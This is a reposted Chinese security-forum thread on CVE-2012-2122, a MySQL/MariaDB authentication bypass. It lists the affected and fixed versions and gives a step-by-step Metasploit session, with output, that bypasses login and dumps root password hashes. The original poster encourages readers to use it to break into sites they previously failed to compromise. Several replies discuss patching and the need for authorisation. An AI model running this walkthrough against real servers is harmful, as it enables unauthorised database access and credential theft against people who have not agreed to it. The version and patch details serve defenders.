[【转载】] CVE-2012-2122: MySQL身份认证漏洞
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空,同时也希望更多的技术爱好者加入我们。9 \K9 ?' A. h: ?$ T" nu! P1 W受影响的产品:
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are90sec9 c1 i1 ~' D1 N9 s2 i, g! B
vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.www.90sec.orgG1 |. B' U# ?4 r, |# c1 r
- 专注信息安全( f' h0 F- O) Z+ C2 I
网上已经出了metasploit版本的相应利用工具,下载地址:
http://github.com/rapid7/metasp ... hbypass_hashdump.rb
利用方法如下:
$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msfauxiliary(mysql_authbypass_hashdump) > set USERNAME root
msfauxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msfauxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
赶快试试吧,说不定以前没日下来的站,这次就日下来了,嘿嘿,刚看到的,就转载过来了
呵呵这个东西我喜欢。。 看的头晕,还是看不懂,我真笨
Re: [【转载】] CVE-2012-2122: MySQL身份认证漏洞
这个漏洞确实影响范围很广,256次尝试就能蒙对一次,利用门槛很低。感谢分享具体的利用工具和步骤,正好可以检查一下自己的数据库是否在受影响版本范围内,及时升级补丁。提醒一下,对线上环境操作前尽量先备份数据,避免意外。Re: [【转载】] CVE-2012-2122: MySQL身份认证漏洞
这个漏洞当年影响面确实很大,密码校验的memcmp返回非零也能通过认证,本质上是个底层的逻辑错误。好在官方很快出了修复版本,建议还在用老版本MySQL/MariaDB的尽快升级到5.1.62/5.2.12/5.3.6/5.5.23以上。虽然Metasploit模块很方便,但用来做渗透测试时要小心授权问题。感谢分享,这种历史漏洞值得回顾,提醒我们代码审查的重要性。Re: [【转载】] CVE-2012-2122: MySQL身份认证漏洞
这个漏洞当年影响确实很广,256次尝试就能概率绕过登录,metasploit模块也让利用门槛降低了很多。感谢分享,已经记下版本范围,回头检查一下服务器有没有及时打补丁。
页:
[1]